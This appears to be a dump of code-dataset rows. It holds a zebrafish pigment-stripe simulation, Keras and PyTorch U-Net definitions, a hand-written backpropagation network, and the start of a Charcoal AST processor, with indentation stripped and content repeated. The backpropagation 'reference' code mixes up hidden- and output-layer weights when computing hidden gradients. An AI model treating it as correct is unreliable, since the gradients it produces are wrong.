img[array == 2, :] = [0, 0, 0] # sets melanophores to black
img[array == 1, :] = [1, 1, 0] # sets xantophores to yellow
return img
if __name__ == '__main__':
startTime = datetime.now()
sim_parameters()
reaction_rates()
array, irid, up, down, left, right = sim_setup(rows, cols)
final = run_sim(array, irid, up, down, left, right)
image = plotter(final)
print(datetime.now()-startTime)
plt.imshow(image)
plt.show() | fastdifgrow/fastdifgrow_main.py | from datetime import datetime
import numpy as np
import matplotlib.pyplot as plt
import math
import random
from initialize import initcond, neighbors
def sim_parameters():
"""This function defines the initial parameters used in simulations"""
global rows, cols, h, per_cycle, num_cycles
rows = 100
cols = 100
h = 15
per_cycle = 10**7
num_cycles = 10**2
def reaction_rates():
"""This function defines the reaction rates for each process"""
global bx, bm, dx, dm, sm, sx, lx
bx = 1 # birth of xantophores
bm = 0 # birth of melanophores
dx = 0 # death of xantophores
dm = 0 # death of melanophores
sm = 1 # short-range killing of xantophore by melanophore
sx = 1 # short-range killing of melanophore by xantophore
lx = 2.5 # long-range activation/birth strength
return
def sim_setup(row=100, col=100):
"""This function sets up the initial simulations, calling initial conditions and neighbors"""
array, irid = initcond.basic(row, col)
up, down, left, right = neighbors.calc4neighbors(row, col)
return array, irid, up, down, left, right
def run_sim(array, irid, up, down, left, right, h=15, num_loops=10**2, per_loop=10**7):
"""This function runs the simulations and outputs the final matrix"""
total = bx + bm + dx + dm + sm + sx + lx
P_bx = bx/total
P_bm = bm/total
P_dx = dx/total
P_dm = dm/total
P_sm = sm/total
P_sx = sx/total
P_lx = lx/total
for loop in range(num_loops):
idx0 = np.random.randint(low=0, high=rows, size=per_loop, dtype=np.uint8)
idx1 = np.random.randint(low=0, high=cols, size=per_loop, dtype=np.uint8)
process = np.random.rand(per_loop)
for n in range(per_loop):
pn = process[n]
location = (idx0[n], idx1[n])
well = array[location]
if pn < P_lx:
if (well == 0) & (~ irid[location]):
angle = random.random() * 2 * math.pi
cosangle = math.cos(angle)
sinangle = math.sin(angle)
i_new = np.around(location[0] + cosangle * h, decimals=0) % array.shape[0]
j_new = np.around(location[1] + sinangle * h, decimals=0) % array.shape[1]
if array[int(i_new), int(j_new)] == 1:
array[location] = 2 # has melanophore form distance away
elif pn < P_lx + P_sx:
if (well == 2):
neigh = ['u', 'd', 'l', 'r']
choice = random.choice(neigh)
if choice == 'u': # chooses neighboring value
neigh_val = array[up[location], location[1]]
elif choice == 'd':
neigh_val = array[down[location], location[1]]
elif choice == 'l':
neigh_val = array[location[0], left[location]]
else:
neigh_val = array[location[0], right[location]]
if neigh_val == 1:
array[location] = 0 # kills melanophore
elif pn < P_lx + P_sx + P_sm:
if (well == 1):
neigh = ['u', 'd', 'l', 'r']
choice = random.choice(neigh)
if choice == 'u': # chooses neighboring value
neigh_val = array[up[location], location[1]]
elif choice == 'd':
neigh_val = array[down[location], location[1]]
elif choice == 'l':
neigh_val = array[location[0], left[location]]
else:
neigh_val = array[location[0], right[location]]
if neigh_val == 2:
array[location] = 0 # kills xantophore
elif pn < P_lx + P_sx + P_sm + P_bx:
if well == 0:
array[location] = 1 # births xantophore
elif pn < P_lx + P_sx + P_sm + P_bx + P_bm:
if well == 0:
array[location] = 2 # births melanophore
elif pn < P_lx + P_sx + P_sm + P_bx + P_bm + P_dx:
if well == 1:
array[location] = 0 # kills xantophore
elif pn < P_lx + P_sx + P_sm + P_bx + P_bm + P_dx + P_dm:
if well == 2:
array[location] = 0 # kills melanophore
return array
def plotter(array):
"""This function plots the arrays in a similar manner to the original paper:
Yellow pixels are xantophores
Black pixels are melanophores
White pixels are empty
"""
img = np.empty((array.shape[0], array.shape[1], 3), dtype=np.float32)
img[array == 0, :] = [1, 1, 1] # sets empty cells to white
img[array == 2, :] = [0, 0, 0] # sets melanophores to black
img[array == 1, :] = [1, 1, 0] # sets xantophores to yellow
return img
if __name__ == '__main__':
startTime = datetime.now()
sim_parameters()
reaction_rates()
array, irid, up, down, left, right = sim_setup(rows, cols)
final = run_sim(array, irid, up, down, left, right)
image = plotter(final)
print(datetime.now()-startTime)
plt.imshow(image)
plt.show() | 0.581422 | 0.602442 |
import torch
import torch.nn as nn
import torch.nn.functional as F
import keras
from keras import backend as K
from keras.models import Input, Model
from keras.layers import Conv2D, MaxPooling2D
from keras.layers import Conv2DTranspose, concatenate
K.set_image_data_format('channels_first')
# From https://github.com/jocicmarko/ultrasound-nerve-segmentation
def unet_keras(input_size=224):
inputs = Input((1, input_size, input_size))
conv1 = Conv2D(32, (3, 3), activation='relu', padding='same',
name='conv_block1_32.conv')(inputs)
conv1 = Conv2D(32, (3, 3), activation='relu', padding='same',
name='conv_block1_32.conv2')(conv1)
pool1 = MaxPooling2D(pool_size=(2, 2))(conv1)
conv2 = Conv2D(64, (3, 3), activation='relu', padding='same',
name='conv_block32_64.conv')(pool1)
conv2 = Conv2D(64, (3, 3), activation='relu', padding='same',
name='conv_block32_64.conv2')(conv2)
pool2 = MaxPooling2D(pool_size=(2, 2))(conv2)
conv3 = Conv2D(128, (3, 3), activation='relu', padding='same',
name='conv_block64_128.conv')(pool2)
conv3 = Conv2D(128, (3, 3), activation='relu', padding='same',
name='conv_block64_128.conv2')(conv3)
pool3 = MaxPooling2D(pool_size=(2, 2))(conv3)
conv4 = Conv2D(256, (3, 3), activation='relu', padding='same',
name='conv_block128_256.conv')(pool3)
conv4 = Conv2D(256, (3, 3), activation='relu', padding='same',
name='conv_block128_256.conv2')(conv4)
pool4 = MaxPooling2D(pool_size=(2, 2))(conv4)
conv5 = Conv2D(512, (3, 3), activation='relu', padding='same',
name='conv_block256_512.conv')(pool4)
conv5 = Conv2D(512, (3, 3), activation='relu', padding='same',
name='conv_block256_512.conv2')(conv5)
up6 = concatenate([Conv2DTranspose(256, (2, 2), strides=(2, 2),
padding='valid',
name='up_block512_256.up')(conv5),
conv4], axis=1)
conv6 = Conv2D(256, (3, 3), activation='relu',
padding='same', name='up_block512_256.conv')(up6)
conv6 = Conv2D(256, (3, 3), activation='relu', padding='same',
name='up_block512_256.conv2')(conv6)
up7 = concatenate([Conv2DTranspose(128, (2, 2), strides=(2, 2),
padding='valid',
name='up_block256_128.up')(conv6),
conv3], axis=1)
conv7 = Conv2D(128, (3, 3), activation='relu',
padding='same', name='up_block256_128.conv')(up7)
conv7 = Conv2D(128, (3, 3), activation='relu', padding='same',
name='up_block256_128.conv2')(conv7)
up8 = concatenate([Conv2DTranspose(64, (2, 2), strides=(2, 2),
padding='valid',
name='up_block128_64.up')(conv7),
conv2], axis=1)
conv8 = Conv2D(64, (3, 3), activation='relu',
padding='same', name='up_block128_64.conv')(up8)
conv8 = Conv2D(64, (3, 3), activation='relu', padding='same',
name='up_block128_64.conv2')(conv8)
up9 = concatenate([Conv2DTranspose(32, (2, 2), strides=(2, 2),
padding='valid',
name='up_block64_32.up')(conv8),
conv1], axis=1)
conv9 = Conv2D(32, (3, 3), activation='relu',
padding='same', name='up_block64_32.conv')(up9)
conv9 = Conv2D(32, (3, 3), activation='relu', padding='same',
name='up_block64_32.conv2')(conv9)
conv10 = Conv2D(2, (1, 1), activation=None, name='last')(conv9)
model = Model(inputs=[inputs], outputs=[conv10])
model.compile(optimizer=keras.optimizers.SGD(),
loss=keras.losses.categorical_crossentropy)
return model
class UNetConvBlock(nn.Module):
def __init__(self, in_size, out_size, kernel_size=3, activation=F.relu):
super(UNetConvBlock, self).__init__()
self.conv = nn.Conv2d(in_size, out_size, kernel_size, padding=1)
self.conv2 = nn.Conv2d(out_size, out_size, kernel_size, padding=1)
self.activation = activation
def forward(self, x):
out = self.activation(self.conv(x))
out = self.activation(self.conv2(out))
return out
class UNetUpBlock(nn.Module):
def __init__(self, in_size, out_size, kernel_size=3,
activation=F.relu, space_dropout=False):
super(UNetUpBlock, self).__init__()
self.up = nn.ConvTranspose2d(in_size, out_size, 2, stride=2)
self.conv = nn.Conv2d(in_size, out_size, kernel_size, padding=1)
self.conv2 = nn.Conv2d(out_size, out_size, kernel_size, padding=1)
self.activation = activation
def center_crop(self, layer, target_size):
batch_size, n_channels, layer_width, layer_height = layer.size()
xy1 = (layer_width - target_size) // 2
return layer[:, :, xy1:(xy1 + target_size), xy1:(xy1 + target_size)]
def forward(self, x, bridge):
up = self.up(x)
crop1 = self.center_crop(bridge, up.size()[2])
out = torch.cat([up, crop1], 1)
out = self.activation(self.conv(out))
out = self.activation(self.conv2(out))
return out
class UNetPytorch(nn.Module):
def __init__(self):
super(UNetPytorch, self).__init__()
self.activation = F.relu
self.pool1 = nn.MaxPool2d(2)
self.pool2 = nn.MaxPool2d(2)
self.pool3 = nn.MaxPool2d(2)
self.pool4 = nn.MaxPool2d(2)
self.conv_block1_32 = UNetConvBlock(1, 32)
self.conv_block32_64 = UNetConvBlock(32, 64)
self.conv_block64_128 = UNetConvBlock(64, 128)
self.conv_block128_256 = UNetConvBlock(128, 256)
self.conv_block256_512 = UNetConvBlock(256, 512)
self.up_block512_256 = UNetUpBlock(512, 256)
self.up_block256_128 = UNetUpBlock(256, 128)
self.up_block128_64 = UNetUpBlock(128, 64)
self.up_block64_32 = UNetUpBlock(64, 32)
self.last = nn.Conv2d(32, 2, 1)
def forward(self, x):
block1 = self.conv_block1_32(x)
pool1 = self.pool1(block1)
block2 = self.conv_block32_64(pool1)
pool2 = self.pool2(block2)
block3 = self.conv_block64_128(pool2)
pool3 = self.pool3(block3)
block4 = self.conv_block128_256(pool3)
pool4 = self.pool4(block4)
block5 = self.conv_block256_512(pool4)
up1 = self.up_block512_256(block5, block4)
up2 = self.up_block256_128(up1, block3)
up3 = self.up_block128_64(up2, block2)
up4 = self.up_block64_32(up3, block1)
return self.last(up4)
if __name__ == "__main__":
net = UNetPytorch() | nn_transfer/test/architectures/unet.py | import torch
import torch.nn as nn
import torch.nn.functional as F
import keras
from keras import backend as K
from keras.models import Input, Model
from keras.layers import Conv2D, MaxPooling2D
from keras.layers import Conv2DTranspose, concatenate
K.set_image_data_format('channels_first')
# From https://github.com/jocicmarko/ultrasound-nerve-segmentation
def unet_keras(input_size=224):
inputs = Input((1, input_size, input_size))
conv1 = Conv2D(32, (3, 3), activation='relu', padding='same',
name='conv_block1_32.conv')(inputs)
conv1 = Conv2D(32, (3, 3), activation='relu', padding='same',
name='conv_block1_32.conv2')(conv1)
pool1 = MaxPooling2D(pool_size=(2, 2))(conv1)
conv2 = Conv2D(64, (3, 3), activation='relu', padding='same',
name='conv_block32_64.conv')(pool1)
conv2 = Conv2D(64, (3, 3), activation='relu', padding='same',
name='conv_block32_64.conv2')(conv2)
pool2 = MaxPooling2D(pool_size=(2, 2))(conv2)
conv3 = Conv2D(128, (3, 3), activation='relu', padding='same',
name='conv_block64_128.conv')(pool2)
conv3 = Conv2D(128, (3, 3), activation='relu', padding='same',
name='conv_block64_128.conv2')(conv3)
pool3 = MaxPooling2D(pool_size=(2, 2))(conv3)
conv4 = Conv2D(256, (3, 3), activation='relu', padding='same',
name='conv_block128_256.conv')(pool3)
conv4 = Conv2D(256, (3, 3), activation='relu', padding='same',
name='conv_block128_256.conv2')(conv4)
pool4 = MaxPooling2D(pool_size=(2, 2))(conv4)
conv5 = Conv2D(512, (3, 3), activation='relu', padding='same',
name='conv_block256_512.conv')(pool4)
conv5 = Conv2D(512, (3, 3), activation='relu', padding='same',
name='conv_block256_512.conv2')(conv5)
up6 = concatenate([Conv2DTranspose(256, (2, 2), strides=(2, 2),
padding='valid',
name='up_block512_256.up')(conv5),
conv4], axis=1)
conv6 = Conv2D(256, (3, 3), activation='relu',
padding='same', name='up_block512_256.conv')(up6)
conv6 = Conv2D(256, (3, 3), activation='relu', padding='same',
name='up_block512_256.conv2')(conv6)
up7 = concatenate([Conv2DTranspose(128, (2, 2), strides=(2, 2),
padding='valid',
name='up_block256_128.up')(conv6),
conv3], axis=1)
conv7 = Conv2D(128, (3, 3), activation='relu',
padding='same', name='up_block256_128.conv')(up7)
conv7 = Conv2D(128, (3, 3), activation='relu', padding='same',
name='up_block256_128.conv2')(conv7)
up8 = concatenate([Conv2DTranspose(64, (2, 2), strides=(2, 2),
padding='valid',
name='up_block128_64.up')(conv7),
conv2], axis=1)
conv8 = Conv2D(64, (3, 3), activation='relu',
padding='same', name='up_block128_64.conv')(up8)
conv8 = Conv2D(64, (3, 3), activation='relu', padding='same',
name='up_block128_64.conv2')(conv8)
up9 = concatenate([Conv2DTranspose(32, (2, 2), strides=(2, 2),
padding='valid',
name='up_block64_32.up')(conv8),
conv1], axis=1)
conv9 = Conv2D(32, (3, 3), activation='relu',
padding='same', name='up_block64_32.conv')(up9)
conv9 = Conv2D(32, (3, 3), activation='relu', padding='same',
name='up_block64_32.conv2')(conv9)
conv10 = Conv2D(2, (1, 1), activation=None, name='last')(conv9)
model = Model(inputs=[inputs], outputs=[conv10])
model.compile(optimizer=keras.optimizers.SGD(),
loss=keras.losses.categorical_crossentropy)
return model
class UNetConvBlock(nn.Module):
def __init__(self, in_size, out_size, kernel_size=3, activation=F.relu):
super(UNetConvBlock, self).__init__()
self.conv = nn.Conv2d(in_size, out_size, kernel_size, padding=1)
self.conv2 = nn.Conv2d(out_size, out_size, kernel_size, padding=1)
self.activation = activation
def forward(self, x):
out = self.activation(self.conv(x))
out = self.activation(self.conv2(out))
return out
class UNetUpBlock(nn.Module):
def __init__(self, in_size, out_size, kernel_size=3,
activation=F.relu, space_dropout=False):
super(UNetUpBlock, self).__init__()
self.up = nn.ConvTranspose2d(in_size, out_size, 2, stride=2)
self.conv = nn.Conv2d(in_size, out_size, kernel_size, padding=1)
self.conv2 = nn.Conv2d(out_size, out_size, kernel_size, padding=1)
self.activation = activation
def center_crop(self, layer, target_size):
batch_size, n_channels, layer_width, layer_height = layer.size()
xy1 = (layer_width - target_size) // 2
return layer[:, :, xy1:(xy1 + target_size), xy1:(xy1 + target_size)]
def forward(self, x, bridge):
up = self.up(x)
crop1 = self.center_crop(bridge, up.size()[2])
out = torch.cat([up, crop1], 1)
out = self.activation(self.conv(out))
out = self.activation(self.conv2(out))
return out
class UNetPytorch(nn.Module):
def __init__(self):
super(UNetPytorch, self).__init__()
self.activation = F.relu
self.pool1 = nn.MaxPool2d(2)
self.pool2 = nn.MaxPool2d(2)
self.pool3 = nn.MaxPool2d(2)
self.pool4 = nn.MaxPool2d(2)
self.conv_block1_32 = UNetConvBlock(1, 32)
self.conv_block32_64 = UNetConvBlock(32, 64)
self.conv_block64_128 = UNetConvBlock(64, 128)
self.conv_block128_256 = UNetConvBlock(128, 256)
self.conv_block256_512 = UNetConvBlock(256, 512)
self.up_block512_256 = UNetUpBlock(512, 256)
self.up_block256_128 = UNetUpBlock(256, 128)
self.up_block128_64 = UNetUpBlock(128, 64)
self.up_block64_32 = UNetUpBlock(64, 32)
self.last = nn.Conv2d(32, 2, 1)
def forward(self, x):
block1 = self.conv_block1_32(x)
pool1 = self.pool1(block1)
block2 = self.conv_block32_64(pool1)
pool2 = self.pool2(block2)
block3 = self.conv_block64_128(pool2)
pool3 = self.pool3(block3)
block4 = self.conv_block128_256(pool3)
pool4 = self.pool4(block4)
block5 = self.conv_block256_512(pool4)
up1 = self.up_block512_256(block5, block4)
up2 = self.up_block256_128(up1, block3)
up3 = self.up_block128_64(up2, block2)
up4 = self.up_block64_32(up3, block1)
return self.last(up4)
if __name__ == "__main__":
net = UNetPytorch() | 0.951605 | 0.713694 |
import random
import math
class NeuralNetwork:
learning_rate = 0.5
def __init__(self,input_num,hidden_num,output_num,input_hidden_weights=None,
input_hidden_bias=None,hidden_output_weights=None,hidden_output_bias=None):
self.input_num = input_num
# 构建掩藏层
self.hidden_layer = NeuralLayer(hidden_num,input_hidden_bias)
# 构建输出层
self.output_layer = NeuralLayer(output_num,hidden_output_bias)
# 初始化输入层到隐藏层权重
self.init_input_to_hidden_weights(input_hidden_weights)
# 初始化隐藏层到输出层权重
self.init_hidden_to_output_weights(hidden_output_weights)
def init_input_to_hidden_weights(self,weights):
weight_num = 0
for i_num in range(len(self.hidden_layer.neurons)):
for o_num in range(self.input_num):
if weights is None:
self.hidden_layer.neurons[i_num].weights.append(random.random())
else:
self.hidden_layer.neurons[i_num].weights.append(weights[weight_num])
weight_num += 1
def init_hidden_to_output_weights(self,weights):
weight_num = 0
for i_num in range(len(self.output_layer.neurons)):
for o_num in range(len(self.hidden_layer.neurons)):
if weights is None:
self.output_layer.neurons[i_num].weights.append(random.random())
else:
self.output_layer.neurons[i_num].weights.append(weights[weight_num])
weight_num += 1
def inspect(self):
print('..................')
print('input inspect:',[i for i in self.inputs])
print('..................')
print('hidden inspect:')
self.hidden_layer.inspect()
print('..................')
print('output inspect:')
self.output_layer.inspect()
print('..................')
def forward(self,inputs):
hidden_layer_outout = self.hidden_layer.forward(inputs)
print('hidden_layer_outout',hidden_layer_outout)
ouput_layer_ouput = self.output_layer.forward(hidden_layer_outout)
print('ouput_layer_ouput',ouput_layer_ouput)
return ouput_layer_ouput
def train(self,x,y):
ouput_layer_ouput = self.forward(x)
# 求total / neto的偏导
total_o_pd = [0] * len(self.output_layer.neurons)
for o in range(len(self.output_layer.neurons)):
total_o_pd[o] = self.output_layer.neurons[o].calculate_total_net_pd(y[o])
# 求total / h的偏导 = total.1 / h的偏导 + total.2 / h的偏导
total_neth_pd = [0] * len(self.hidden_layer.neurons)
for h in range(len(self.hidden_layer.neurons)):
total_h_pd = 0
for o in range(len(self.output_layer.neurons)):
total_h_pd += total_o_pd[o] * self.hidden_layer.neurons[h].weights[o]
total_neth_pd[h] = total_h_pd * self.output_layer.neurons[h].calculate_output_net_pd()
# 更新输出层神经元权重
for o in range(len(self.output_layer.neurons)):
for ho_w in range(len(self.output_layer.neurons[o].weights)):
ho_w_gradient = total_o_pd[o] * self.output_layer.neurons[o].calculate_net_linear_pd(ho_w)
self.output_layer.neurons[o].weights[ho_w] -= self.learning_rate * ho_w_gradient
# 更新隐藏层神经元权重
for h in range(len(self.hidden_layer.neurons)):
for ih_w in range(len(self.hidden_layer.neurons[h].weights)):
ih_w_gradient = total_neth_pd[h] * self.hidden_layer.neurons[h].calculate_net_linear_pd(ih_w)
self.hidden_layer.neurons[h].weights[ih_w] -= self.learning_rate * ih_w_gradient
def calculate_total_error(self, training_sets):
total_error = 0
for t in range(len(training_sets)):
training_inputs, training_outputs = training_sets[t]
self.forward(training_inputs)
for o in range(len(training_outputs)):
total_error += self.output_layer.neurons[o].calculate_error(training_outputs[o])
return total_error
class NeuralLayer:
def __init__(self,neural_num,bias):
self.bias = bias if bias else random.random()
self.neurons = []
for i in range(neural_num):
self.neurons.append(Neuron(self.bias))
def inspect(self):
print('weights:',[neuron.weights for neuron in self.neurons])
print('bias:',[neuron.bias for neuron in self.neurons])
def get_output(self,inputs):
outputs = []
for neuron in self.neurons:
outputs.append(neuron.output)
return outputs
def forward(self,inputs):
outputs = []
for neuron in self.neurons:
outputs.append(neuron.calculate_output(inputs))
return outputs
class Neuron:
def __init__(self,bias):
self.bias = bias
self.weights = []
def calculate_output(self,inputs):
self.inputs = inputs
total_net_outputs = self.calculate_total_net_output()
self.output = self.sigmoid(total_net_outputs)
return self.output
def calculate_total_net_output(self):
total = 0
for i in range(len(self.inputs)):
total += self.inputs[i] * self.weights[i]
return total + self.bias
def sigmoid(self,total_net_input):
return 1 / (1 + math.exp(-total_net_input))
def calculate_total_output_pd(self,total_output):
return -(total_output - self.output)
def calculate_output_net_pd(self):
return self.output * (1 - self.output)
def calculate_total_net_pd(self,total_output):
return self.calculate_total_output_pd(total_output) * self.calculate_output_net_pd()
def calculate_net_linear_pd(self,index):
return self.inputs[index]
def calculate_error(self, target_output):
return 0.5 * (target_output - self.output) ** 2
nn = NeuralNetwork(2, 2, 2, input_hidden_weights=[0.15, 0.2, 0.25, 0.3], input_hidden_bias=0.35,
hidden_output_weights=[0.4, 0.45, 0.5, 0.55], hidden_output_bias=0.6)
for i in range(10000):
nn.train([0.05, 0.1], [0.01, 0.99])
print(i+1, round(nn.calculate_total_error([[[0.05, 0.1], [0.01, 0.99]]]), 9)) | bpnn/ref_code/nn.py | import random
import math
class NeuralNetwork:
learning_rate = 0.5
def __init__(self,input_num,hidden_num,output_num,input_hidden_weights=None,
input_hidden_bias=None,hidden_output_weights=None,hidden_output_bias=None):
self.input_num = input_num
# 构建掩藏层
self.hidden_layer = NeuralLayer(hidden_num,input_hidden_bias)
# 构建输出层
self.output_layer = NeuralLayer(output_num,hidden_output_bias)
# 初始化输入层到隐藏层权重
self.init_input_to_hidden_weights(input_hidden_weights)
# 初始化隐藏层到输出层权重
self.init_hidden_to_output_weights(hidden_output_weights)
def init_input_to_hidden_weights(self,weights):
weight_num = 0
for i_num in range(len(self.hidden_layer.neurons)):
for o_num in range(self.input_num):
if weights is None:
self.hidden_layer.neurons[i_num].weights.append(random.random())
else:
self.hidden_layer.neurons[i_num].weights.append(weights[weight_num])
weight_num += 1
def init_hidden_to_output_weights(self,weights):
weight_num = 0
for i_num in range(len(self.output_layer.neurons)):
for o_num in range(len(self.hidden_layer.neurons)):
if weights is None:
self.output_layer.neurons[i_num].weights.append(random.random())
else:
self.output_layer.neurons[i_num].weights.append(weights[weight_num])
weight_num += 1
def inspect(self):
print('..................')
print('input inspect:',[i for i in self.inputs])
print('..................')
print('hidden inspect:')
self.hidden_layer.inspect()
print('..................')
print('output inspect:')
self.output_layer.inspect()
print('..................')
def forward(self,inputs):
hidden_layer_outout = self.hidden_layer.forward(inputs)
print('hidden_layer_outout',hidden_layer_outout)
ouput_layer_ouput = self.output_layer.forward(hidden_layer_outout)
print('ouput_layer_ouput',ouput_layer_ouput)
return ouput_layer_ouput
def train(self,x,y):
ouput_layer_ouput = self.forward(x)
# 求total / neto的偏导
total_o_pd = [0] * len(self.output_layer.neurons)
for o in range(len(self.output_layer.neurons)):
total_o_pd[o] = self.output_layer.neurons[o].calculate_total_net_pd(y[o])
# 求total / h的偏导 = total.1 / h的偏导 + total.2 / h的偏导
total_neth_pd = [0] * len(self.hidden_layer.neurons)
for h in range(len(self.hidden_layer.neurons)):
total_h_pd = 0
for o in range(len(self.output_layer.neurons)):
total_h_pd += total_o_pd[o] * self.hidden_layer.neurons[h].weights[o]
total_neth_pd[h] = total_h_pd * self.output_layer.neurons[h].calculate_output_net_pd()
# 更新输出层神经元权重
for o in range(len(self.output_layer.neurons)):
for ho_w in range(len(self.output_layer.neurons[o].weights)):
ho_w_gradient = total_o_pd[o] * self.output_layer.neurons[o].calculate_net_linear_pd(ho_w)
self.output_layer.neurons[o].weights[ho_w] -= self.learning_rate * ho_w_gradient
# 更新隐藏层神经元权重
for h in range(len(self.hidden_layer.neurons)):
for ih_w in range(len(self.hidden_layer.neurons[h].weights)):
ih_w_gradient = total_neth_pd[h] * self.hidden_layer.neurons[h].calculate_net_linear_pd(ih_w)
self.hidden_layer.neurons[h].weights[ih_w] -= self.learning_rate * ih_w_gradient
def calculate_total_error(self, training_sets):
total_error = 0
for t in range(len(training_sets)):
training_inputs, training_outputs = training_sets[t]
self.forward(training_inputs)
for o in range(len(training_outputs)):
total_error += self.output_layer.neurons[o].calculate_error(training_outputs[o])
return total_error
class NeuralLayer:
def __init__(self,neural_num,bias):
self.bias = bias if bias else random.random()
self.neurons = []
for i in range(neural_num):
self.neurons.append(Neuron(self.bias))
def inspect(self):
print('weights:',[neuron.weights for neuron in self.neurons])
print('bias:',[neuron.bias for neuron in self.neurons])
def get_output(self,inputs):
outputs = []
for neuron in self.neurons:
outputs.append(neuron.output)
return outputs
def forward(self,inputs):
outputs = []
for neuron in self.neurons:
outputs.append(neuron.calculate_output(inputs))
return outputs
class Neuron:
def __init__(self,bias):
self.bias = bias
self.weights = []
def calculate_output(self,inputs):
self.inputs = inputs
total_net_outputs = self.calculate_total_net_output()
self.output = self.sigmoid(total_net_outputs)
return self.output
def calculate_total_net_output(self):
total = 0
for i in range(len(self.inputs)):
total += self.inputs[i] * self.weights[i]
return total + self.bias
def sigmoid(self,total_net_input):
return 1 / (1 + math.exp(-total_net_input))
def calculate_total_output_pd(self,total_output):
return -(total_output - self.output)
def calculate_output_net_pd(self):
return self.output * (1 - self.output)
def calculate_total_net_pd(self,total_output):
return self.calculate_total_output_pd(total_output) * self.calculate_output_net_pd()
def calculate_net_linear_pd(self,index):
return self.inputs[index]
def calculate_error(self, target_output):
return 0.5 * (target_output - self.output) ** 2
nn = NeuralNetwork(2, 2, 2, input_hidden_weights=[0.15, 0.2, 0.25, 0.3], input_hidden_bias=0.35,
hidden_output_weights=[0.4, 0.45, 0.5, 0.55], hidden_output_bias=0.6)
for i in range(10000):
nn.train([0.05, 0.1], [0.01, 0.99])
print(i+1, round(nn.calculate_total_error([[[0.05, 0.1], [0.01, 0.99]]]), 9)) | 0.388966 | 0.290138 |
from charcoaltoken import CharcoalToken as CT
from unicodegrammars import UnicodeGrammars
def PassThrough(r):
return r
def GetFreeVariable(s, n=1):
r = ""
for _ in range(n):
r += next(filter(lambda c: c not in s + r, "ικλμνξπρςστυφχψωαβγδεζηθ"))
return r
def VerbosifyVariable(c):
return "iklmnxprsvtufcywabgdezhq"["ικλμνξπρςστυφχψωαβγδεζηθ".find(c)]
def EvaluateFunctionOrList(f, s):
if isinstance(f, list):
return f[0](s)
return f(s)
ASTProcessor = {
CT.Arrow: [
lambda r: [lambda s="": [r[0] + ": Left"]],
lambda r: [lambda s="": [r[0] + ": Up"]],
lambda r: [lambda s="": [r[0] + ": Right"]],
lambda r: [lambda s="": [r[0] + ": Down"]],
lambda r: [lambda s="": [r[0] + ": Up Left"]],
lambda r: [lambda s="": [r[0] + ": Up Right"]],
lambda r: [lambda s="": [r[0] + ": Down Right"]],
lambda r: [lambda s="": [r[0] + ": Down Left"]],
lambda r: [lambda s="": [r[0] + ": Direction", r[1][0](s)]]
],
CT.Multidirectional: [
lambda r: [lambda s="": ["Multidirectional"] + r[0][0](s)[1:] + r[1][0](s)[1:]],
lambda r: [lambda s="": [r[1][0](s)[0], r[0] + ": Right, down, left, up"] + r[1][0](s)[1:]],
lambda r: [lambda s="": [r[1][0](s)[0], r[0] + ": Down right, down left, up left, up right, "] + r[1][0](s)[1:]],
lambda r: [lambda s="": [r[1][0](s)[0], r[0] + ": Right, down right, down, down left, left, up left, up, up right, "] + r[1][0](s)[1:]],
lambda r: [lambda s="": [r[1][0](s)[0], r[0] + ": Down, up"] + r[1][0](s)[1:]],
lambda r: [lambda s="": [r[1][0](s)[0], r[0] + ": Right, left"] + r[1][0](s)[1:]],
lambda r: [lambda s="": [r[1][0](s)[0], r[0] + ": Down right, up left"] + r[1][0](s)[1:]],
lambda r: [lambda s="": [r[1][0](s)[0], r[0] + ": Down left, up right"] + r[1][0](s)[1:]],
lambda r: [lambda s="": [r[1][0](s)[0], r[0] + ": Down right, up right"] + r[1][0](s)[1:]],
lambda r: [lambda s="": [r[1][0](s)[0], r[0] + ": Down left, up left"] + r[1][0](s)[1:]],
lambda r: [lambda s="": [r[1][0](s)[0], r[0] + ": Down right, down left"] + r[1][0](s)[1:]],
lambda r: [lambda s="": [r[1][0](s)[0], r[0] + ": Down right, down, up, up right"] + r[1][0](s)[1:]],
lambda r: [lambda s="": [r[1][0](s)[0], r[0] + ": Right, up"] + r[1][0](s)[1:]],
lambda r: [lambda s="": [r[1][0](s)[0], r[0] + ": Right, down, left"] + r[1][0](s)[1:]],
lambda r: [lambda s="": [r[1][0](s)[0], r[0] + ": Up left, up right"] + r[1][0](s)[1:]],
lambda r: [lambda s="": [r[1][0](s)[0], r[0] + ": Down, up left, up right"] + r[1][0](s)[1:]],
lambda r: [lambda s="": [r[1][0](s)[0], r[0] + ": Down left, left"] + r[1][0](s)[1:]],
lambda r: [lambda s="": [r[1][0](s)[0], r[0] + ": Down, left"] + r[1][0](s)[1:]],
lambda r: [lambda s="": [r[1][0](s)[0], r[0] + ": Right, up"] + r[1][0](s)[1:]],
lambda r: [lambda s="": [r[1][0](s)[0], r[0] + ": Right, down"] + r[1][0](s)[1:]],
lambda r: [lambda s="": r[1][0](s)],
lambda r: [lambda s="": r[1][0](s)],
lambda r: [lambda s="": r[1][0](s)],
lambda r: [lambda s="": ["Multidirectional"]]
],
CT.Side: [lambda r: [lambda s="": ["Side"] + [el[0](s) for el in r]]],
CT.String: [
lambda r: [lambda s="": [repr(r[0]) + ": String %s" % repr(r[0])]]
],
CT.Number: [
lambda r: [lambda s="": [str(r[0]) + ": Number %s" % str(r[0])]]
],
CT.Name: [lambda r: [lambda s="": [r[0] + ": Identifier %s (%s)" % (str(r[0]), VerbosifyVariable(str(r[0])))]]],
CT.S: [lambda r: [lambda s="": []]] * 2,
CT.Span: [
lambda r: [lambda s="": [
"Span", ["Start", r[0][0](s)], ["Stop", r[2][0](s)], ["Step", r[4][0](s)]
]],
lambda r: [lambda s="": ["Span", ["Start", r[0][0](s)], ["Step", r[3][0](s)]]],
lambda r: [lambda s="": ["Span", ["Start", r[0][0](s)], ["Stop", r[2][0](s)]]],
lambda r: [lambda s="": ["Span", ["Start", r[0][0](s)]]],
lambda r: [lambda s="": ["Span", ["Stop", r[1][0](s)], ["Step", r[3][0](s)]]],
lambda r: [lambda s="": ["Span", ["Stop", r[1][0](s)]]],
lambda r: [lambda s="": ["Span", ["Step", r[2][0](s)]]],
lambda r: [lambda s="": ["Span"]]
],
CT.Arrows: [
lambda r: [lambda s="": ["Arrows", r[0][0](s)] + r[1][0](s)[1:]],
lambda r: [lambda s="": ["Arrows", r[0][0](s)]]
],
CT.Sides: [
lambda r: [lambda s="": ["Sides", r[0][0](s)] + r[1][0](s)[1:]],
lambda r: [lambda s="": ["Sides", r[0][0](s)]]
],
CT.Expressions: [
lambda r: [lambda s="": ["Expressions", r[0][0](s)] + r[1][0](s)[1:]],
